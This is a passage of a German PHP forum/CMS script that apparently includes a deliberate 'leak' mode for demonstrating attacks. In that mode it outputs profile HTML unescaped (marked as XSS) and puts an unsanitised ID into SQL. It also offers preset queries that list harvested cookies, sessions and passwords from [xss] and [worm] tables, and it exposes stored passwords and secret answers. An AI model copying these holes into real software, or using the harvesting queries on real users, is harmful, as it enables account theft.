<input type='hidden' name='change' value='
$post[change]' />
<input type='submit' name='test' value='Vorschau' /> <input type='submit' name='save' value='Speichern' /> "
.(($status/2%2) ? "<input type='submit' name='remove' value='Löschen' onclick='return confirm(\"Wirklich Löschen?\")' /> " : "")."<input type='reset' value='Zurücksetzen' /> <input type='submit' name='stop' value='Abbruch' /></td></tr></table></fieldset></form><script type='text/javascript'><!--
document.cms."
.(($post['content']) ? 'content' : 'name').".focus();//--></script>";
}
}
}
}

# Creole-Syntax ausgeben
if((preg_match('/Admin|Beitrag|Bearbeiten/',$request) or $request == 'CMS' and (isset($_GET['id']) or isset($_GET['q'])) and !isset($_REQUEST['remove']))
and (
$uid or $gast) or $request == 'Creole' and !isset($_REQUEST['nodemo'])) {
$creolevar = array_merge($creolevar,array('type' => 'intern'));
$val = array("**Fett**","//Kursiv//","++Größer++","--Kleiner--","~~Durchgestrichen~~","__Unterstrichen__",
"##Druckschrift##","^^Hoch^^ gestellt",",,Tief,, gestellt","**//__Kombiniert__//**","@@**Fett** ~//Code//@@",
"===Überschrift 3","* List\n** Unter\n* Punkt","# List\n## Unter\n# Zahl","; List\n: Info\n;; Rekursiv\n:: Info",
"[[[Einfacher\nUmbruch]]]","Um\\\\bruch aus~\\\\setzen","^CMS CreoleLink","http://www.xx","mail@www.xx",
"[[http://www.xx|title]]","[[back->http://www.xx]]"," Plaintext","----","{{/favicon.ico|Ikone}}","{{{**//Plain//**}}}",
"??key:value?? / ??key??","<<echo str=&#39;foo bar&#39;>>",". <<<_ nix>>> /* nix */","|>\n|=Tabelle|=Titel|\n|Spalte |Zelle |");
foreach(
$val as $key => $var)
$val[$key] = "<tr><td><pre>".strtr($var,array_slice($html,1))."</pre></td><td>".str_replace("\n",'<br />',@preg_replace(array_keys($creole),array_values($creole),$var))."</td></tr>";
$out = "<table align='right' id='crs' style='display:none'><tr><td><a href='#' title='Tabelle einblenden' onclick='".strtr(preg_replace($js,'',"
document.getElementById('crh').style.display = 'block';
document.getElementById('crs').style.display = 'none';
document.cookie = 'hide=' + ((x = document.cookie.match(/(^|\W)hide=(\w+)/)) ? (x[2] & 65535-(1<<1)) + (1<<1) * 0 : 0) + '; path=
$self';
return false;
"
),array('&' => '&amp;', "'" => '"'))."'>&laquo;</a></td></tr></table>
<table align='right' border='1' class='cr' id='crh'><tr><td colspan='2'>
<table align='right' cellpadding='0' cellspacing='0' style='display:none' id='cra'><tr><td><a href='#' title='Tabelle ausblenden' onclick='"
.strtr(preg_replace($js,'',"
document.getElementById('crh').style.display = 'none';
document.getElementById('crs').style.display = 'block';
document.cookie = 'hide=' + ((x = document.cookie.match(/(^|\W)hide=(\w+)/)) ? (x[2] & 65535-(1<<1)) + (1<<1) * 1 : 1<<1) + '; path=
$self';
return false;
"
),array('&' => '&amp;', "'" => '"'))."'>&raquo;</a></td></tr></table>
<a href='http://www.wikicreole.org/wiki/PressReleaseGerman'
$tgb><b>Forumschreibweise:</b></a></td></tr>".implode('',$val)
.((
$img) ? "<tr><td colspan='2'>".@preg_replace(array_keys($creole),array_values($creole),
"**Smilie-Codes:**\n<table width='100%' cellpadding='0' cellspacing='0' id='smile'><tr><td valign='bottom'><small>
:D @@~:-D ~;-D ~:D ~;D@@
8) @@~8-) ~B-) ~8) ~B)@@
8O @@~8-O ~8-o ~8O ~8o@@</small></td><td valign='bottom'><small> :) @@~:-) ~:)@@
;) @@~;-) ~;)@@
8| @@~8-| ~8|@@</small></td><td valign='bottom'><small> ~~ @@~~-~~ ~~@@</small></td></tr><tr><td valign='top'><small> :( @@~:-( ~;-( ~:( ~;(@@
:| @@~:-| ~;-| ~:| ~;|@@
:? @@~:-? ~;-? ~:? ~;?@@</small></td><td valign='top' colspan='2'><small> :C @@~:-C ~;-C ~:-c ~;-c ~:C ~;C ~:c ~;c@@
:O @@~:-O ~;-O ~:-o ~;-o ~:o ~;o ~:O ~;O@@
:x @@~:-x ~;-x ~:-X ~;-X ~:x ~;x ~:X ~;X@@</small></td></tr><tr><td colspan='3' valign='top'><small> :P @@~:-P ~;-P ~:-p ~;-p ~:-b ~;-b ~:P ~;P ~:p ~;p ~:b ~;b@@</small></td></tr></table>"
)."</td></tr>" : "")."</table><script type='text/javascript'><!--\n".preg_replace($js,'',"
document.getElementById('cra').style.display = 'block';
if(window.innerWidth && window.innerWidth < 1000 || ((x = document.cookie.match(/(^|\W)hide=(\w+)/)) && x[2]&(1<<1)))
document.getElementById('crh').style.display = 'none',
document.getElementById('crs').style.display = 'block';"
.(($img) ? "
var a,s = document.getElementById('smile').getElementsByTagName('img');
for(a = 0; a < s.length; a++)
s[a].setAttribute('onclick','setsmile(\" ' + s[a].alt + '\")');
function setsmile(s) {
if((a = document.getElementsByTagName('body')[0].getElementsByTagName('textarea'))) {
if(document.selection)
document.selection.createRange().text = s;
else
if(a[0].selectionStart || a[0].selectionStart == '0')
a[0].value = a[0].value.substring(0,a[0].selectionStart) + s + a[0].value.substring(a[0].selectionEnd,a[0].value.length);
else
a[0].value += s;
a[0].focus();
}
}"
: ""))."//--></script>$out";
}

# Creole Demo
if($request == 'Creole')
if(
$leak or $uid) {
$creolevar['type'] = 'cms';
if(isset(
$_POST['source']))
$out .= "<fieldset class='cr'><legend><b><a href='#edit'>Creole Ansicht:</a></b></legend>".@preg_replace(array_keys($creole),array_values($creole),strtr(($var = $_POST['source']),array_slice($html,1)))."</fieldset><br />";
else
$var = '';
$out .= "<a name='edit'></a><form action='$self/$request' method='post'><fieldset><legend><b>Creole Livedemo</b> <small><a href='#edit'>(edit)</a></small></legend>
<small>Quelltext:</small><br /><textarea style='width:100%' name='source' cols='80' rows='
$taz'>".strtr($var,$html)."</textarea><br />
<input type='submit' name='test' value='Anzeigen' /> <input type='reset' value='Zurücksetzen' /> <input type='submit' name='stop' value='Abbrechen' />"
.((($leak or $status/2%2) and isset($_COOKIE['debug']) and $_COOKIE['debug']) ? " <input type='checkbox' name='nodemo' id='nodemo' ".((isset($_REQUEST['nodemo'])) ? " checked" : "")."> <label for='nodemo'><small>Keine Legende erstellen</small></label>" : "")."</fieldset></form><script type='text/javascript'><!--
document.forms[0].source.focus();//--></script>"
;
}
else
$request = 'Impressum';

# Source
if(preg_match('/^source(?:\.(txt|html|php\.gz))?$/i',$request,$val)) {
if(
$sql and $q and preg_match('/\d+/',$q,$var) and $line = $sql['aq']($conn,"
select strftime('%d.%m.%Y %H:%M:%S',f.[create]) as datum,
userid,
mailid,
username,
title,
message
from [forum] as f
left join [user] as u on f.userid = u.id
where f.id=
$var[0]".(($status/2%2) ? '' : " and f.status".(($status%4 == 0) ? "%2 = 0" : " is not null")."
and (f.mailid is null or f.mailid = ifnull('
$uid',null) or f.mailid is not null and f.userid = ifnull('$uid',null) or f.mailid = f.userid)"),SQLITE_ASSOC))
$out .= "<fieldset><legend><a href='$self".(($line[0]['mailid']) ? "/Mail" : "")."?q=$var[0]'>".((is_null($line[0]['title'])) ? "<em>Ohne Titel</em>"
: "<b>".strtr($line[0]['title'],array_slice($html,1))."</b>")."</a> von "
.((is_null($line[0]['username'])) ? "Unbekannt" : "<a href='$self/Profil?id=".$line[0]['userid']."'>".$line[0]['username']."</a>")
.
" vom ".$line[0]['datum']."</legend><pre style='white-space:pre-wrap'>".strtr($line[0]['message'],array_slice($html,1))."</pre></fieldset>";
else {
$val[] = '';
$lines = file(__file__);
if(isset(
$_GET['download']) or $val[1] == 'php.gz') {
header("Content-Type: application/octet-stream");
header('Content-Disposition: filename="'.basename(__FILE__).'.gz"');
die(
$gz['encode'](implode('',$lines),9));
}
elseif(
strtolower($request) == $request and $val[1] != 'html' or $val[1] == 'txt') {
header('Content-Type: text/plain; charset=8859-1');
die(
implode('',$lines));
}
else {
foreach(
$lines as $key => $var)
while(
false !== $tab = strpos($lines[$key],"\t"))
$lines[$key] = substr($lines[$key],0,$tab).str_repeat(' ',8-$tab%8).substr($lines[$key],$tab+1);
$out .= "<pre style='white-space:pre-wrap'>".strtr(highlight_string(implode('',$lines),true),array('&nbsp;' => ' ', "\r" => '', "\n" => ''))."</pre>";
}
}
}

if(
$sql) {

# SQLite-Terminal mit Option auf vorgegegebenen Querys der XSS-Attacken
if(($leak and $query or $info[3] != '' or $status/2%2) and $request == 'SQL') {
$val = '';
$q = false;
if(
$leak) {
$set = (preg_match('/\w+/',$query,$var)) ? $var[0] : ((isset($_POST['preset'])) ? $_POST['preset'] : '');
if(
$set == "worm")
$q = "
select *
from [worm]
order by id desc
limit 0,25"
;
elseif(
preg_match('/(cookie|account)/',$set))
$q = "
select x.id as ID,
i.hits as Hits,
strftime('%d.%m.%Y %H:%M:%S',[create]) as 'Datum/Zeit',
href as Url,"
.(($set == 'account') ? "
user as Username,
pass as Password,"
: "
sess as Session,
data as Cookie,"
)."
useragent as UserAgent
from [xss] as x
inner join ( select max(id) as id,
count(*) as hits
from [xss]"
.(($set == 'account') ? "\n\twhere user is not null and pass is not null" : "")."
group by "
.(($set == 'cookie') ? "sess,data" : "user,pass")."
) as i on i.id = x.id
order by x.id desc
limit 0,25"
;
$array = array(
'account' => 'Accountdaten',
'cookie' => 'Cookies und Sessions',
'worm' => 'Daten vom Wurm',
'sqlite' => 'SQLite Mastertabelle');
foreach(
$array as $key => $var)
$array[$key] = "<option value='$key' ".(($query == $key or isset($_POST['preset']) and $_POST['preset'] == $key) ? " selected" : "").">$var</option>";
$val = "<select name='preset' size='1' onChange='this.form.submit()'><option value=''>Preset-Querys:</option>".implode("",$array)."</select>";
}
if(
$status/2%2 or $info[3] != '') {
if(
$leak and $set == 'sqlite')
$q = "select * from $sql[m]";
$array = $sql['sq']($conn,"select name from $sql[m] where type = 'table'");
foreach(
$array as $key => $var)
$array[$key] = "<option value='$var'".((isset($_POST['table']) and isset($_POST['query']) and $_POST['table'] == $var and $_POST['query'] == '') ? " selected" : '').">$var (".$sql['sq']($conn,"select count(*) from [$var]").")</option>";
$val = "<select name='table' size='1' onChange='".preg_replace($js,'',"
if(this.form.query.value == \"\")
this.form.submit();
else {
this.form.query.value += \"[\" + this.value + \"]\";
this.value = \"\";
this.form.query.focus();
}"
)."'><option value=''>Tabellen:</option>".implode("",$array)."</select> $val";
if(!
$q and isset($_POST['query']) and $_POST['query'] != "")
$q = $_POST['query'];
else

if(isset(
$_FILES['file']) and !$_FILES['file']['error'] and file_exists($_FILES['file']['tmp_name']))
$q = implode('',$gz['file']($_FILES['file']['tmp_name']));
if(!
$q and isset($_POST['table']) and $_POST['table'] != '')
$q = "select * from [".preg_replace('/\W/','',$_POST['table'])."]";
$out = "$info[8]<form name='sql' action='$self/SQL' method='post' enctype='multipart/form-data'><fieldset><legend><b>SQLite-Query-Tool (<a href='$self/Backup' title='Backup'>$base</a>)</b></legend>
<small>Datenbankabfrage</small><br /><textarea name='query' rows='16' cols='80' style='width:100%' onChange='this.form.preset.value=\"\"'>"
.strtr($q,$html)."</textarea><br />
<input type='submit' value='Ausführen' title='Mit Ergebnistabelle' />
<input type='submit' name='exec' value='Daten Update' title='Ohne Ergebnistabelle' />
<input type='reset' value='Zurücksetzen' onDblClick='this.form.query.value=\"\";this.form.preset.value=\"\";' title='Eingabe löschen' /> <input type='file' name='file' title='Komprimierten Query hochladen' />
$val</fieldset></form><script type='text/javascript'><!--
document.sql.query.focus();//--></script>"
;
}
if(
$q)
if(
$result = (isset($_POST['exec']) and ($status/2%2 or $info[3] != '')) ? @$sql['e']($conn,$q) : @$sql['q']($conn,$q)) {
if((!
is_object($result) and $var = $sql['c']($conn)) or is_object($result) and !$sql['nf']($result) or (is_bool($result) or !$sql['nf']($result)))
$out .= "<p>Es wurden ".preg_replace('/^0$/','keine',$var)." Einträge geändert!</p>";
else {
$line = '';
for(
$a=0;$a<$sql['nf']($result);$a++)
$line .= "<td><b>".strtr($sql['fn']($result,$a),$html)."</b></td>";
$line = array("<tr>$line</tr>");
while(
$row = $sql['fa']($result,SQLITE_NUM)) {
$var = '';
for(
$a=0;$a<count($row);$a++)
$var .= "<td>".((is_null($row[$a])) ? "<font color='gray' ><i>NULL</i></font>" : (($row[$a] === '') ? "&nbsp;" : preg_replace('/[\r\n]+/','<br />',trim(strtr($row[$a],$html)))))."</td>";
$line[] = "<tr>$var</tr>";
}
if(
count($line) > 1)
$out .= "<p>Es befinden sich ".number_format(count($line)-1,0,'','.')." Einträge in der Tabelle!</p><table border='1'>".implode('',$line)."</table><br />";
}
}
else
if(@
$sql['le']($conn) != 0)
$out .= "<p><b>Abfrage fehlgeschlagen</b>: ".@$sql['ers'](@$sql['le']($conn))."</p>";
$out .= "<address>SQLite ".$sql['lv']()." ".php_uname()." (PHP ".phpversion()."/".php_sapi_name().") - Charset: ".$sql['lc']()."</address><!---->";
}

# Forum Formular
if($request == 'Beitrag' and ($uid or $gast) and $rw) {
if(!
$id and isset($_POST['id']) and preg_match('/^\d+$/',$_POST['id'],$var))
$id = $var[0];
if(
$id and ($var = $sql['aq']($conn,"
select f.id as id,
strftime('%s',f.[create]) as 'create',
strftime('%d.%m.%Y %H:%M:%S',f.[create]) as crdatum,
strftime('%s',f.change) as change,
strftime('%d.%m.%Y %H:%M:%S',f.change) as chdatum,
f.changes as changes,
f.title as title,
f.message as message,
f.status,
ifnull(f.status%2,'-1') as right,
u.status,
u.username as username,
f.userid as userid,
f.mailid as mailid
from [forum] as f
left join user as u on f.userid = u.id and f.status"
.(($status%4 == 0) ? "%2 = 0" : " is not null")." and u.status is not null
where f.id =
$id and (f.mailid is null or f.mailid = nullif('$uid',''))
limit 1"
))) {
$var = reset($var);
$creolevar = array_merge($creolevar,array('type' => 'forum', 'id' => $var['id'], 'name' => $var['id'], 'title' => $var['title'], 'create' => $var['create'], 'right' => $var['right'], 'from' => $var['username']));
if(!isset(
$_POST['message']))
$out .= "<fieldset class='cr'><legend>(<a href='#edit'>$var[id]</a>) "
.((is_null($var['title'])) ? "<i>Ohne Titel</i>" : "<b>".preg_replace(array_keys($smile),array_values($smile),strtr($var['title'],array_slice($html,1)))."</b>")
.
" <small>(Erstellt: $var[crdatum]".(($var['create'] != $var['change']) ? " / <span title='Änderungen: $var[changes]'>Geändert: $var[chdatum]</span>" : '')
.((
$var['userid'] != $var['mailid']) ? " von ".((is_null($var['username'])) ? "Unbekannt" : "<a href='$self/Profil?id=$var[userid]'>$var[username]</a>") : '')
.
")</small></legend>".@preg_replace(array_keys($creole),array_values($creole),strtr($var['message'],array_slice($html,1)))."</fieldset><br />";
}
else
$var = array('id' => '');
$val = preg_replace($phtml[0],$phtml[1],((isset($_POST['title'])) ? $_POST['title'] : ((isset($var['title'])) ? $var['title'] : "")));
$line = preg_replace($phtml[0],$phtml[1],((isset($_POST['message'])) ? $_POST['message'] : ((count($var) > 1 and $var['mailid'] === $var['userid']) ? $var['message'] : '')));
if(isset(
$_REQUEST['mail']))
$wrt = $_REQUEST['mail'];
elseif(isset(
$var['mailid']))
$wrt = $var['mailid'];
else
$wrt = false;
if(isset(
$_POST['message']))
$out .= "<fieldset class='cr'><legend><b><a href='#edit'>Vorschau:</a></b> "
.((isset($_POST['title']) and $_POST['title'] == '') ? "<i>Ohne Titel</i>" : "<b>".preg_replace(array_keys($smile),array_values($smile),$val)."</b>")
.
" <small>(".$sql['sq']($conn,"select tagline from user where id = $uid")
.
")</small></legend>".@preg_replace(array_keys($creole),array_values($creole),strtr($_POST['message'],$html))."</fieldset><br />";
$usr = $sql['aq']($conn,"
select u.id as id,
u.username as username
from [user] as u
left join [user] as s on u.id = s.id and s.id "
.(($uid) ? "= $uid" : "is null")."
where u.status is not null
order by s.id desc,u.username"
);
foreach(
$usr as $k => $v)
$usr[$k] = "<option value='$v[id]'".((isset($var['mailid']) and !is_null($var['mailid']) and $var['userid'] == $v['id'] or isset($_REQUEST['mail']) and $_REQUEST['mail'] == $v['id'] or isset($_REQUEST['blog']) and $v['id'] == $uid) ? " selected": "").((isset($var['userid']) and $v['id'] == $var['userid']) ? " style='font-weight:bold'" : "").">".(($uid == $v['id']) ? "Blog von" : "Mail an").": $v[username]</option>";
$k = (isset($_REQUEST['mail']) and preg_match('/\d+/',$_REQUEST['mail'],$v) and $k = $sql['aq']($conn,"select username,tagline from [user] where id=$v[0]")) ? array($k[0]['username'],(($leak or is_null($k[0]['tagline'])) ? $k[0]['tagline'] : strtr($k[0]['tagline'],array_slice($html,1)))) : false;
$out .= "<a name='edit'></a><form action='$self/$request".(($var['id'] != '') ? "?q=$var[id]" : "")."' method='post'><fieldset><legend><b>Neuen Beitrag ".(($k) ? "an $k[0] " : "")."verfassen</b>"
.(($k and !is_null($k[1])) ? " (<small id='tl'>$k[1]</small>)" : "")." <small>(<a href='#edit'>edit</a>)</small></legend>
<small>Titel:</small><br /><input type='text' name='title' value='
$val' style='width:100%' /><br />
<small>Nachricht:</small><br /><textarea style='width:100%' name='message' cols='80' rows='
$taz'>$line</textarea><br /><input type='hidden' name='id' value='$var[id]' />
<input type='hidden' name='max' value='"
.$sql['sq']($conn,'select max(id) from [forum]')."' />
<input type='hidden' name='mode' value='"
.(($wrt == $uid) ? 'Blog' : (($wrt) ? 'Mail' : ''))."' />
<input type='submit' name='test' value='Vorschau' /> <input type='submit' name='save' value='Speichern' /> <input type='reset' value='Zurücksetzen' /> <input type='submit' name='stop' value='Abbrechen' /> <select name='mail' size='1'><option value=''>Beitrag ins Forum</option>"
.implode("",$usr)."</select>"
.(($status%2) ? " <select name='right' size='1'><option value='0'>Für alle Sichtbar</option><option value='1'".((isset($_POST['right']) and $_POST['right'] == 1 or isset($_REQUEST['mail']) and $_REQUEST['mail'] and $_REQUEST['mail'] != $uid or isset($var['f.status']) and $var['f.status']%2 == 1) ? " selected" : "").">Nur für Benutzer</option></select>" : "")
.
"</fieldset></form><script type='text/javascript'><!--
document.forms[0]."
.(($val) ? "message" : "title").".focus();//--></script>";
}

# Benutzerprofil anzeigen
if(preg_match('/(Profil|Bearbeiten)/',$request)) {
$var = ($mid) ? $mid : (($id) ? $id : $uid);
if((!
$lone or $user or $uid) and $var) {
if(
$usr = $sql['aq']($conn,"
select (select count(*)
from [forum]
where userid =
$var and mailid is null and status".(($status%4 == 0) ? "%2 = 0" : " is not null").")
||','|| (select count(*)
from [forum]
where userid =
$var and mailid is not null and status is not null)
||','|| (select count(*)
from [forum]
where userid =
$var and mailid is not null and status is not null and status/2%2 = 0)
||','|| (select count(*)
from [forum]
where mailid =
$var and userid != $var and status is not null)
||','|| (select count(*)
from [forum]
where mailid =
$var and userid != $var and status is not null and status/2%2 = 0)
||','|| (select count(*)
from [forum]
where mailid = userid and userid =
$var and status".(($status%4 == 0) ? "%2 = 0" : " is not null").")
||','|| (select count(*)
from [file]
where user=
$var and status ".(($status%4 == 0) ? '' : '<')."= 1)
||','|| (select sum(abs(size))
from [file]
where user=
$var and status is not null) as count,
*
from [user] as u
where "
.(($status/2%2) ? "" : "status is not null and ")."id=".((isset($_GET['id']) and $_GET['id']) ? (($leak) ? $_GET['id'] : preg_replace('/\D/','',$_GET['id'])) : (($var) ? $var: $uid)))) {
$usr = reset($usr);
if(isset(
$usr['id']))
@
$creolevar = array_merge($creolevar,array('type' => 'profil', 'id' => $usr['id'], 'name' => $usr['username'], 'from' => $usr['username'], 'title' => $usr['tagline'], 'create' => strtotime($usr['create']), 'change' => strtotime($usr['change']), 'right' => ((is_null($usr['status'])) ? -1 : ($usr['status']/2%2))));
$v = "<td valign='top'>";
$k = substr($v,0,-1)." nowrap>";
if(isset(
$usr['passhelp']) and preg_match('/^(\d+)-(?:(.+):)?(.+)$/',$usr['passhelp'],$val) and isset($pass[$val[1]]))
$usr['passhelp'] = array((($val[2] != '') ? $val[2] : $pass[$val[1]]),$val[3]);
if(
substr_count($usr[0],",") < 6)
$usr[0] .= ",0,0,0,0,0,0,0";
$val = explode(',',$usr[0]); // count,mailout,newout,mailin,newin,blog,upload,bytes
if(($uid == $var or $status/2%2) and isset($usr['id']) and $usr['id']) {
$out .= "<div align='right'>".@preg_replace(array_keys($creole),array_values($creole),"--"
.preg_replace(array('/^.*\[ |~/s','/ \].*$/s'),array('',' | '),$info[4])."[[^"
.((isset($_GET['id'])) ? "Daten".(($status/2%2 and $uid != $usr['id']) ? "?id=$var" : '')."|Daten bearbeiten" : "Profil?id=$var|Meine Daten anzeigen")
.
"]] | [[^Bearbeiten".(($status/2%2 and $uid != $usr['id']) ? "?id=$var" : '').((count($_POST) == 0)? "#edit" : "")."|Profil bearbeiten]]--")."</div>";
if(isset(
$_GET['id'])) {
if(
$status/2%2 and $uid != $var) {
$head['atom'] = "<link rel='alternate' title='Atomfeed von $usr[username]' type='application/atom+xml' href='$self/Atom?id=$var.".$hash[0]($sql['sq']($conn,"select username||':'||password from [user] where id=$var"))."' />";
$uedit = "Daten?id=$var";
}
else
$uedit = "Daten";
$out .= "<fieldset><legend><b>".(($uid == $var) ? "Ihre gespeicherten Daten" : "Die gespeicherten Daten von <b>$usr[username]</b>")."</b></legend><table>
<tr>
$k<b>Benutzer-ID:</b></td>$k".number_format($usr['id'],0,'','.')."</td>
$k<b>Benutzername:</b></td>$v$usr[username]</td></tr>
<tr>
$k<b>Logins:</b></td>$k".number_format($usr['logins'],0,'','.')."</td>
$k<b>Kennwort:</b></td>$v".(($usr['password'] == '') ? "<em>Nicht angegeben!</em>" : "<script type='text/javascript' language='javascript'>document.write(\"<a href='#' onClick='alert(unescape(\\\"".implode('',preg_replace('/(\w\w)/','%$0',unpack('H*',$usr['password'])))."\\\"))'>".((preg_match('/^salt:\w+-hash:\w+$/',$usr['password'])) ? "Verschlüsselt!" : "Anzeigen")."<\/a>\");</script><noscript><font size='1'><em>Bitte&nbsp;JavaScript&nbsp;aktivieren!</em></font></noscript>")."</td></tr>
<tr>
$k<b>Zugriffe:</b></td>$k".number_format($usr['requests'],0,'','.')."</td>
$k<b>Vorname:</b></td>$v$usr[forename]</td></tr>
<tr>
$k<b>Änderungen:</b></td>$k".number_format($usr['changes'],0,'','.')."</td>
$k<b>Nachname:</b></td>$v$usr[lastname]</td></tr>
<tr>
$k<b>Forumbeiträge:</b></td>$k".number_format(intval($val[0]),0,'','.')."</td>
$k<b>eMail:</b></td>$v<a href='mailto:$usr[mail]'>$usr[mail]</a></td></tr>
<tr>
$k<b>Blog:</b></td>$k".number_format($val[5],0,'','.')."</td>
$k<b>Homepage:</b></td>$v".(($usr['page'] == '') ? "<em>Nicht&nbsp;angegeben!</em>" : "<a href='".preg_replace('/^(?!https?:\/\/)/','http://',$usr['page'])."'$tgb>$usr[page]</a>")."</td></tr>
<tr>
$k<b>Mailverkehr:</b></td>$k".(($val[4]) ? "<span title='Eingang (Neu)'>".number_format($val[4],0,'','.')."</span> / " : "")."<span title='Eingang (Alle)'>".number_format($val[3],0,'','.')."</span> | ".(($val[2]) ? "<span title='Ausgang (Neu)'>".number_format($val[2],0,'','.')."</span> / " : "")."<span title='Ausgang (Alle)'>".number_format($val[1],0,'','.')."</span></td>
$k<b>Wohnort:</b></td>$v".(($usr['town'] == '') ? "<em>Nicht angegeben!</em>" : $usr['town'])."</td></tr>
<tr>
$k<b>Chat-Texte:</b></td>$k".$sql['sq']($conn,"select count(*) from [chat] where id = $var")."</td>
$k<b>Chat-Status:</b></td>$v".(($usr['chat'] and substr($usr['chat'],0,1) != '-') ? "Im Chat mit: ".((is_array($wrt = $sql['sq']($conn,"
select ifnull(username,'Unbekannt')
from [user]
where id !=
$uid and id != chat and chat = ".strval($usr['chat'])."
order by username"
))) ? implode(', ',$wrt) : $wrt) : (($status/4%2) ? "Frei" : "Aus")).(($status/8%2) ? " <span title='Verschlüsselt'>$lock</span>" : '')."</td></tr>
<tr>
$k<b>Dateien:</b></td>$k$val[6]</td>
$k<b>Sicherheitsfrage:</b></td>$v".((is_array($usr['passhelp'])) ? $usr['passhelp'][0] : "<em>Nicht angegeben!</em>")."</td></tr>
<tr>
$k<b>Datei-Freiraum:</b></td>$k".number_format($maxfile-$val[7],0,'','.')." Bytes</td>
$k<b>Geheim-Antwort:</b></td>$v".((is_array($usr['passhelp'])) ? "<script type='text/javascript'>document.write(\"<a href='#' onClick='alert(unescape(\\\"".implode('',preg_replace('/(\w\w)/','%$0',unpack('H*',$usr['passhelp'][1])))."\\\"))'>Anzeigen<\/a>\");</script><noscript><font size='1'><em>Bitte&nbsp;JavaScript&nbsp;aktivieren!</em></font></noscript>" : "<em>Nicht angegeben!</em>")."</td></tr>
<tr>
$k<b>Status:</b></td>{$v}Log ".(($usr['status']%2) ? 'in' : 'off')."</td>
$k<b>Geburtstag:</b></td>$v".(($usr['born']) ? date('d.m.Y',strtotime($usr['born']))." (".floor((time()-strtotime($usr['born']))/365.2425/24/60/60).")" : "<em>Nicht&nbsp;angegeben!</em>")."</td></tr>
<tr>
$k<b>Rechte:</b></td>$k".(($usr['status']/2%2) ? 'Admin' : ((is_null($usr['status'])) ? 'Keine' : 'Benutzer'))."</td>
$k<b>Bildschirm:</b></td>$v".(($usr['info'] == '') ? "<em>Nicht angegeben!</em>" : preg_replace('/(\d+),(\d+),(\d+)/','$1 * $2 / $3',$usr['info']))."</td></tr>
<tr>
$k<b>Erstanmeldung:</b></td>$k".date('d.m.Y H:i:s',strtotime($usr['create']))."</td>
$k<b>IP-Adresse:</b></td>$v$usr[ip]</td></tr>
<tr>
$k<b>Letzter Besuch:</b></td>$k".((isset($_SESSION['lua']) and $uid == $usr['id']) ? date('d.m.Y H:i:s',strtotime($_SESSION['lua'])) : "<em>Unbekannt</em>")."</td>
$k<b>SessionID:</b></td>$v$usr[session]</td></tr>
<tr>
$k<b>Letzte Aktion:</b></td>$k".date('d.m.Y H:i:s',strtotime($usr['change']))."</td>
$k<b>Browser:</b></td>$v$usr[useragent]</td></tr>
</table></fieldset>"
;
}
}
if(isset(
$usr['id']) and $usr['id']) {
$v = array("Erstanmeldung: ".date('d.m.Y',strtotime($usr['create'])));
if(
$val[0])
$v[] = "<a href='$self?id=$usr[id]'>Beiträge: ".number_format($val[0],0,'','.')."</a>";
if(isset(
$val[5]) and $val[5])
$v[] = "<a href='$self/Blog/$usr[username]'>Blogs: ".number_format($val[5],0,'','.')."</a>";
if(isset(
$val[6]) and $val[6])
$v[] = "<a href='$self?s=d&amp;id=$usr[id]'>Uploads: ".number_format($val[6],0,'','.')."</a>";
if(
$uid or $gast)
$v[] = "<a href='$self/Beitrag?mail=$usr[id]'>Mail an $usr[username]</a>";
if(
$usr['page'])
$v[] = "Homepage: <a href='".preg_replace('/^(?!https?:\/\/)/','http://',$usr['page'])."'$tgb>".preg_replace('!^https?://!','',$usr['page'])."</a>";
if(!
$uedit and ($uid == $usr['id'] or $status%2))
$uedit = "Bearbeiten".(($uid != $usr['id']) ? "?id=$usr[id]" : "")."#edit";
}
$out .= "<fieldset class='cr'><legend>Profil von <b>".(($uid and isset($usr['id']) and $usr['id'] and $var != $uid) ? "<a href='$self/Beitrag?mail=$usr[id]' title='Mail an $usr[username]'>$usr[username]</a>"
: $usr['username'])."</b>".((!isset($usr['tagline']) or !$usr['tagline']) ? "" : " (<small id='tl' title='Tagline'>".@preg_replace(array_keys($creole),array_values($creole),
((
$leak and isset($_GET['source']) or !$leak) ? strtr($usr['tagline'],$html) : $usr['tagline']))."</small>)").(($request == 'Bearbeiten') ? " <small><a href='#edit'>(edit)</a></small>" : '')
.
"</legend>"
.(($leak and isset($usr['id']) and $usr['id'] and ($status/2%2 or isset($_COOKIE['debug']) and $_COOKIE['debug']) and preg_match("!<(script)[^>]*>.*</\\1>!i",$usr['profil'])) ? "<a href='$self/Profil/$usr[username]?source'><img align='right' src='$self/img?".(count($img)-2)."' border='0' height='16' style='height:1em' alt='XSS' title='XSS Quelltext' /></a>" : '')
.((
count($v) > 1) ? "<div id='kontakt'><small>".implode(' / ',$v)."</small></div><hr />" : "")."<div id='profil'>"
.(($leak and isset($_GET['source'])) ? "<pre style='white-space:pre-wrap'>".strtr($usr['profil'],$html)."</pre>"
: @preg_replace(array_keys($creole),array_values($creole),
strtr(((isset($_POST['profil']) and isset($_POST['test'])) ? $_POST['profil'] : ((is_null($usr['profil'])) ? 'Noch kein Profil hinterlegt!' : $usr['profil'])),(($leak) ? array() : array_slice($html,1)))))."</div></fieldset>"; // XSS
}
else {
$out .= "<h3>Benutzer nicht gefunden!</h3>";
$request = 'Mitglieder';
}
}
else
$request = 'Mitglieder';
}

# Benutzerprofil Formular
if($request == 'Bearbeiten' and $uid and $rw)
$out .= "<br /><a name='edit'></a><form action='$self/$request' method='get'>"
.(($status/2%2 and $uid != $usr['id']) ? "<input type='hidden' name='id' value='$usr[id]'>" : '')
.
"<fieldset><legend><b>Tagline Bearbeiten</b></legend><table width='100%'><tr><td width='99%'><input type='text' size='80' maxlength='255' style='width:100%' name='tl' value='".strtr($usr['tagline'],$html)."' ondblclick='this.value=\"\"' /></td><td><input type='submit' value='Setzen' /></td></tr></table></fieldset></form>
<form name='profile' action='
$self/Bearbeiten".(($status/2%2 and $uid != $usr['id']) ? "?id=$usr[id]" : '')."' method='post'>
<fieldset><legend><b>Profil Bearbeiten</b> <small>(<a href='#edit'>edit</a>)</small></legend><textarea style='width:100%' name='profil' cols='80' rows='15' id='bearbeiten'>"
.preg_replace($phtml[0],$phtml[1],((isset($_POST['profil'])) ? $_POST['profil'] : $usr['profil']))."</textarea><br />
<input type='hidden' name='uid' value='
$usr[id]' /><input type='submit' name='test' value='Vorschau' />
<input type='submit' name='save' value='Speichern' /> <input type='reset' value='Zurücksetzen' />
<input type='submit' name='stop' value='Abbruch' />"
